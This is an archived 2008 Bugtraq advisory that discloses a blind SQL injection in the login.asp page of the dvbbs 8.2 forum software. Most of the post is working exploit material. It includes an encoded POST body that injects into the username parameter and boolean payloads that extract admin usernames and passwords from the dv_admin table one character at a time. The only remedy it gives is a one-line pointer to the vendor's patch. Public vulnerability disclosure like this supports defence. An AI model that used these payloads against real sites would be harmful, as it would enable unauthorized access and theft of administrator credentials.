lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 29 May 2008 10:19:00 -0000
From: hackerb@...mail.com
To: bugtraq@...urityfocus.com
Subject: dvbbs8.2(access/sql)version login.asp remote sql injection

name:
where (topsec security research group)

email:
hackerb@...mail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection

danger level:
critical/High

info:
dvbbs is prone to multiple sql injection security flaw

interrelated code to access version(exp):
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

Examples(access version):
decide
Where’ and ‘1’=’1
where’ and ‘1’=’2
to get usernamer or password
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
.......................
.......................
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
......................
......................

Solution:
Authorities patch 
dvbbs web site(http://www.dvbbs.net)

References:
dvbbs(http://www.dvbbs.net)

Powered by blists - more mailing lists